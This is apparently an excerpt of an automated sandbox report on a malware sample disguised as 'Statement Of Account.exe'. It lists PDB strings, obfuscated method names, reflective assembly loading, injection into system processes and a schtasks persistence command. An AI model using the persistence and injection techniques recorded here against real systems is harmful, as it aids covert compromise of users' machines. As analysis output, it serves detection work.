Source: Binary string: RegSvcs.pdb, | source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmstp.pdb | source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: IuBP.pdb | source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
Source: Binary string: IuBP.pdbSHA256 | source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
Source: Binary string: RegSvcs.pdb | source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp

Data Obfuscation

          Source: Statement Of Account.exe, Form1.cs.Net Code: InitializeComponent
          Source: SdYCcXyq.exe.0.dr, Form1.cs.Net Code: InitializeComponent
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs.Net Code: LQXNHvCMSd System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs.Net Code: LQXNHvCMSd System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Statement Of Account.exe.5b50000.5.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_014AF1D0 push esp; iretd 0_2_014AF1D1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F709AD push ecx; mov dword ptr [esp], ecx8_2_00F709B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F41FEC push eax; iretd 8_2_00F41FED
          Source: C:\Windows\explorer.exeCode function: 9_2_0F424B02 push esp; retn 0000h9_2_0F424B03
          Source: C:\Windows\explorer.exeCode function: 9_2_0F424B1E push esp; retn 0000h9_2_0F424B1F
          Source: C:\Windows\explorer.exeCode function: 9_2_0F4249B5 push esp; retn 0000h9_2_0F424AE7
          Source: C:\Windows\explorer.exe Code function: 9_2_0F9079B5 push esp; retn 0000h 9_2_0F907AE7
          Source: C:\Windows\explorer.exe Code function: 9_2_0F907B1E push esp; retn 0000h 9_2_0F907B1F
          Source: C:\Windows\explorer.exe Code function: 9_2_0F907B02 push esp; retn 0000h 9_2_0F907B03
          Source: C:\Windows\explorer.exe Code function: 9_2_109989B5 push esp; retn 0000h 9_2_10998AE7
          Source: C:\Windows\explorer.exe Code function: 9_2_10998B1E push esp; retn 0000h 9_2_10998B1F
          Source: C:\Windows\explorer.exe Code function: 9_2_10998B02 push esp; retn 0000h 9_2_10998B03
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_00DAF1D0 push esp; iretd 11_2_00DAF1D1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00417024 push ecx; iretd 14_2_00417025
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004170C2 push edx; ret 14_2_004170CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004073EB push ebp; ret 14_2_004073EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00416CC8 push D1939A9Fh; retf 14_2_00416CCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D4B5 push eax; ret 14_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D56C push eax; ret 14_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D502 push eax; ret 14_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D50B push eax; ret 14_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0148B008 push es; iretd 14_2_0148B009
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0148135E push eax; iretd 14_2_01481369
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0148225F pushad ; ret 14_2_014827F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014827FA pushad ; ret 14_2_014827F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01489939 push es; iretd 14_2_01489940
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014B09AD push ecx; mov dword ptr [esp], ecx 14_2_014B09B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0148283D push eax; iretd 14_2_01482858
          Source: Statement Of Account.exe Static PE information: section name: .text entropy: 7.029755289423976
          Source: SdYCcXyq.exe.0.dr Static PE information: section name: .text entropy: 7.029755289423976
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, Bcn4S3hlHm4ofn0hWj.cs High entropy of concatenated method names: 'GDEHxgDGA', 'tYj5dHTDg', 'JNoeq4kWd', 'g5t8HqLSZ', 'YBUIgkyS1', 'UjZZk3M4o', 'ql6t42cGZ0WDyn0MLS', 'bCHSOedbw4bS5XncxO', 'auYc4Z6cj', 'VXGfx1i9m'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, IINHKBNMRCCi1qwcT4.cs High entropy of concatenated method names: 'g3psCh6ggw', 'zWjsl9TAIW', 'RyxsSOpt3s', 'rd2stT1CJ0', 'v08so1KPlL', 'wrwsyg4x55', 'iwioIk0swFUEZBibht', 'pQqv78jX3pgowug16i', 'GN4ssNUZeQ', 'b3gsL2P2Ja'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, zWJJGGvxAwIgbu8YWv.cs High entropy of concatenated method names: 'Dispose', 'cLPsm1QABu', 'JrdhXYY10i', 'Eu711fIRHP', 'aQLsa6tORB', 'u4iszNhhYx', 'ProcessDialogKey', 'a5nhwnUDt3', 'VFUhsoMxNx', 'hswhhUKk7y'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, y8skBgpa9DSqAAHi65.cs High entropy of concatenated method names: 'wXxCMBhITq', 'iSNCFpQWTu', 'TmGCykQv91', 'pGbVCy6fmRrj8w83J3B', 'HX57Yr6dij3cDcw8nZE', 'KGslbe62CCecrUoAl2Q'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, KlLQrwBg4x55Bf4v3j.cs High entropy of concatenated method names: 'hshbUAEa38', 'BOtbvG5rar', 'YW1bTDUetD', 'P1NbCLn0AI', 'xPublVLFwq', 'rkLTYjYuHM', 'eolTuOiEu1', 'HO7Tj2Mlgd', 'GgATGvvLUK', 'swMTmE533E'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs High entropy of concatenated method names: 'GQCLU1fsBV', 'OggLgSfqfP', 'k6mLv8Wdpm', 'tLvL6mlKpe', 'M6iLTTDO5d', 'jdVLbZ7tSH', 'CHqLCehSyg', 'BXRLlYQvvA', 'FrZLE7YZD6', 'PO8LScWh16'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, uoIQEWIyxOpt3scd2T.cs High entropy of concatenated method names: 'q0c65vZu1H', 'lTh6ebi0b9', 'l5T6KLhHD3', 'tta6IraGW9', 'IRt6op2078', 'mwJ6yhIO7r', 'vwj6M2CwEQ', 'v9u6cEQGaY', 'uL26Fofc0L', 'tya6f8vOTy'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, Lh6ggwKHWj9TAIWXF7.cs High entropy of concatenated method names: 'bZTvW88oku', 'B2dvq6nDRs', 'dYWviVhG8n', 'lGRvD7C9SJ', 'msIvYjmoSw', 'cJbvuxMQR0', 'tuBvjL7PIo', 'DB1vGnChZg', 'wGEvmmajPa', 'gB1vaxe9Bb'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, c3OREwnQa3GNYU832f.cs High entropy of concatenated method names: 'EaXC2J1Xfr', 'q9PC0j1Kck', 'FR7CHFr0Yq', 'GKfC5vyv6g', 'cYYCRN9RVD', 'pieCeE21AL', 'XsQC8srmZf', 'xJJCKmrAax', 'N1MCIvjgZg', 'zSFCZjkWBc'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, eKk7ynaiv2Ji3kdDNx.cs High entropy of concatenated method names: 'bxqFskNs4A', 'J9gFLHpSnj', 'jpcFNWRTN6', 'hTuFggBc9P', 'jkeFvFY9Qr', 'R1DFTsoCBK', 'eKHFbg0uBg', 'wP7cjoMBvv', 'BBIcGdsMpL', 'jmDcmCqjoF'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, vaiTpIWP0Ndo0ZuNPf.cs High entropy of concatenated method names: 'CIlo3uUZUZ', 'C9doAcyHgg', 'TROoWBGsWm', 'CudoqFX6Q1', 'H8ToX9CNYF', 'y90o9Aw5ue', 'vseoJMmbmu', 'VWCoVvOFsG', 'aFsoPsXTUF', 'MXfoxfrLjf'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, h6IC2siSXaigkWxfxe.cs High entropy of concatenated method names: 'ToString', 'mn6ykMiSYS', 'mucyXXPffh', 'VnEy9UvwQp', 'hu7yJJjjyS', 'piAyV81VFy', 'eTyyPKh7j4', 'GBqyxI8Y4L', 'KhFypvEk8o', 'j8EyngdZ1j'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, taVahudoRs29QscL9X.cs High entropy of concatenated method names: 'vSe7KJ0EA2', 'waj7IRQ96c', 'GB47BX7vT7', 'HVS7XCJfIW', 'Q3w7JY2PRd', 'BSV7Vw2uBZ', 'Coo7xxFsvw', 'MM97pZdd8W', 'E4873BV1La', 'N717kAEdCD'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, FoLy8GswBljqbcaAATd.cs High entropy of concatenated method names: 'IO2F2vFQxi', 'GeSF0fhAIc', 'lI2FHDKJtR', 'aShF5GF4rh', 'n9mFRmsYhN', 'attFeXbRQ7', 'qaOF8gOZKj', 'jRfFKGpl92', 'AP4FIDSJok', 'qawFZXBVAy'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, vL6tORGBO4iNhhYxw5.cs High entropy of concatenated method names: 'lEUcgSVhVm', 'c1RcvQsPDR', 'NqLc6nZ1b9', 'DTWcTWbMZk', 'o6CcbG8qpS', 'GSxcCU9ntO', 'cQqclevKSr', 'eUbcEOyuIk', 'CiqcS7EQY0', 'gGactN4U3c'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, TtlxsAzSTRsL7Foskh.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DatF7wtdUY', 'fHNFoj4Gc6', 'sTvFyYjGqo', 'k9cFMSVY0l', 'gBwFcrAsyQ', 'bEDFFmGWmG', 'MM5FfmHqty'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, UZ9qWJD1Wm6HGuskXY.cs High entropy of concatenated method names: 'MuxMSRIqLf', 'eoAMt7Bf3x', 'ToString', 'z4ZMgtlE6w', 'qi8MvO2l3Q', 'M5SM6Oc8xJ', 'oEcMTp3ZPV', 'sU0MbiX6NP', 'uORMC1EheX', 'mghMlaaqJi'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, W7eOYc6mPKkSUdZ3uK.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm6vhmyEc8U', 'jPmhauc7Tw', 'iruhzclfhq', 'vKxLwVGDsP', 'JM3Ls5bQTN', 'KLwLh5M3fb', 'RgbLLgVK73', 'GxIJyZqufdqH2nZOs2A'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, lu1UrfsLPxGyI9Nnu1R.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wvGfWtnNM5', 'Lmhfq335DW', 'q4vfiq4ZXL', 'mXPfDpR7K3', 'M6efYX4oOZ', 'mVHfuybBbm', 'fFVfjwAtBj'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, MnUDt3mjFUoMxNxTsw.cs High entropy of concatenated method names: 'wFBcBTIJfC', 'vFkcXDm3at', 'nlrc9wGx7x', 'WOGcJO0prD', 'J7DcW0lxRi', 'oo2cVoGcMv', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, Bcn4S3hlHm4ofn0hWj.cs High entropy of concatenated method names: 'GDEHxgDGA', 'tYj5dHTDg', 'JNoeq4kWd', 'g5t8HqLSZ', 'YBUIgkyS1', 'UjZZk3M4o', 'ql6t42cGZ0WDyn0MLS', 'bCHSOedbw4bS5XncxO', 'auYc4Z6cj', 'VXGfx1i9m'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, IINHKBNMRCCi1qwcT4.cs High entropy of concatenated method names: 'g3psCh6ggw', 'zWjsl9TAIW', 'RyxsSOpt3s', 'rd2stT1CJ0', 'v08so1KPlL', 'wrwsyg4x55', 'iwioIk0swFUEZBibht', 'pQqv78jX3pgowug16i', 'GN4ssNUZeQ', 'b3gsL2P2Ja'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, zWJJGGvxAwIgbu8YWv.cs High entropy of concatenated method names: 'Dispose', 'cLPsm1QABu', 'JrdhXYY10i', 'Eu711fIRHP', 'aQLsa6tORB', 'u4iszNhhYx', 'ProcessDialogKey', 'a5nhwnUDt3', 'VFUhsoMxNx', 'hswhhUKk7y'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, y8skBgpa9DSqAAHi65.cs High entropy of concatenated method names: 'wXxCMBhITq', 'iSNCFpQWTu', 'TmGCykQv91', 'pGbVCy6fmRrj8w83J3B', 'HX57Yr6dij3cDcw8nZE', 'KGslbe62CCecrUoAl2Q'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, KlLQrwBg4x55Bf4v3j.cs High entropy of concatenated method names: 'hshbUAEa38', 'BOtbvG5rar', 'YW1bTDUetD', 'P1NbCLn0AI', 'xPublVLFwq', 'rkLTYjYuHM', 'eolTuOiEu1', 'HO7Tj2Mlgd', 'GgATGvvLUK', 'swMTmE533E'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs High entropy of concatenated method names: 'GQCLU1fsBV', 'OggLgSfqfP', 'k6mLv8Wdpm', 'tLvL6mlKpe', 'M6iLTTDO5d', 'jdVLbZ7tSH', 'CHqLCehSyg', 'BXRLlYQvvA', 'FrZLE7YZD6', 'PO8LScWh16'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, uoIQEWIyxOpt3scd2T.cs High entropy of concatenated method names: 'q0c65vZu1H', 'lTh6ebi0b9', 'l5T6KLhHD3', 'tta6IraGW9', 'IRt6op2078', 'mwJ6yhIO7r', 'vwj6M2CwEQ', 'v9u6cEQGaY', 'uL26Fofc0L', 'tya6f8vOTy'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, Lh6ggwKHWj9TAIWXF7.cs High entropy of concatenated method names: 'bZTvW88oku', 'B2dvq6nDRs', 'dYWviVhG8n', 'lGRvD7C9SJ', 'msIvYjmoSw', 'cJbvuxMQR0', 'tuBvjL7PIo', 'DB1vGnChZg', 'wGEvmmajPa', 'gB1vaxe9Bb'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, c3OREwnQa3GNYU832f.cs High entropy of concatenated method names: 'EaXC2J1Xfr', 'q9PC0j1Kck', 'FR7CHFr0Yq', 'GKfC5vyv6g', 'cYYCRN9RVD', 'pieCeE21AL', 'XsQC8srmZf', 'xJJCKmrAax', 'N1MCIvjgZg', 'zSFCZjkWBc'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, eKk7ynaiv2Ji3kdDNx.cs High entropy of concatenated method names: 'bxqFskNs4A', 'J9gFLHpSnj', 'jpcFNWRTN6', 'hTuFggBc9P', 'jkeFvFY9Qr', 'R1DFTsoCBK', 'eKHFbg0uBg', 'wP7cjoMBvv', 'BBIcGdsMpL', 'jmDcmCqjoF'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, vaiTpIWP0Ndo0ZuNPf.cs High entropy of concatenated method names: 'CIlo3uUZUZ', 'C9doAcyHgg', 'TROoWBGsWm', 'CudoqFX6Q1', 'H8ToX9CNYF', 'y90o9Aw5ue', 'vseoJMmbmu', 'VWCoVvOFsG', 'aFsoPsXTUF', 'MXfoxfrLjf'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, h6IC2siSXaigkWxfxe.cs High entropy of concatenated method names: 'ToString', 'mn6ykMiSYS', 'mucyXXPffh', 'VnEy9UvwQp', 'hu7yJJjjyS', 'piAyV81VFy', 'eTyyPKh7j4', 'GBqyxI8Y4L', 'KhFypvEk8o', 'j8EyngdZ1j'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, taVahudoRs29QscL9X.cs High entropy of concatenated method names: 'vSe7KJ0EA2', 'waj7IRQ96c', 'GB47BX7vT7', 'HVS7XCJfIW', 'Q3w7JY2PRd', 'BSV7Vw2uBZ', 'Coo7xxFsvw', 'MM97pZdd8W', 'E4873BV1La', 'N717kAEdCD'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, FoLy8GswBljqbcaAATd.cs High entropy of concatenated method names: 'IO2F2vFQxi', 'GeSF0fhAIc', 'lI2FHDKJtR', 'aShF5GF4rh', 'n9mFRmsYhN', 'attFeXbRQ7', 'qaOF8gOZKj', 'jRfFKGpl92', 'AP4FIDSJok', 'qawFZXBVAy'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, vL6tORGBO4iNhhYxw5.cs High entropy of concatenated method names: 'lEUcgSVhVm', 'c1RcvQsPDR', 'NqLc6nZ1b9', 'DTWcTWbMZk', 'o6CcbG8qpS', 'GSxcCU9ntO', 'cQqclevKSr', 'eUbcEOyuIk', 'CiqcS7EQY0', 'gGactN4U3c'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, TtlxsAzSTRsL7Foskh.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DatF7wtdUY', 'fHNFoj4Gc6', 'sTvFyYjGqo', 'k9cFMSVY0l', 'gBwFcrAsyQ', 'bEDFFmGWmG', 'MM5FfmHqty'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, UZ9qWJD1Wm6HGuskXY.cs High entropy of concatenated method names: 'MuxMSRIqLf', 'eoAMt7Bf3x', 'ToString', 'z4ZMgtlE6w', 'qi8MvO2l3Q', 'M5SM6Oc8xJ', 'oEcMTp3ZPV', 'sU0MbiX6NP', 'uORMC1EheX', 'mghMlaaqJi'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, W7eOYc6mPKkSUdZ3uK.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm6vhmyEc8U', 'jPmhauc7Tw', 'iruhzclfhq', 'vKxLwVGDsP', 'JM3Ls5bQTN', 'KLwLh5M3fb', 'RgbLLgVK73', 'GxIJyZqufdqH2nZOs2A'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, lu1UrfsLPxGyI9Nnu1R.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wvGfWtnNM5', 'Lmhfq335DW', 'q4vfiq4ZXL', 'mXPfDpR7K3', 'M6efYX4oOZ', 'mVHfuybBbm', 'fFVfjwAtBj'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, MnUDt3mjFUoMxNxTsw.cs High entropy of concatenated method names: 'wFBcBTIJfC', 'vFkcXDm3at', 'nlrc9wGx7x', 'WOGcJO0prD', 'J7DcW0lxRi', 'oo2cVoGcMv', 'Next', 'Next', 'Next', 'NextBytes'
          Source: C:\Users\user\Desktop\Statement Of Account.exe File created: C:\Users\user\AppData\Roaming\SdYCcXyq.exe

          Boot Survival

          Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xED
          Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
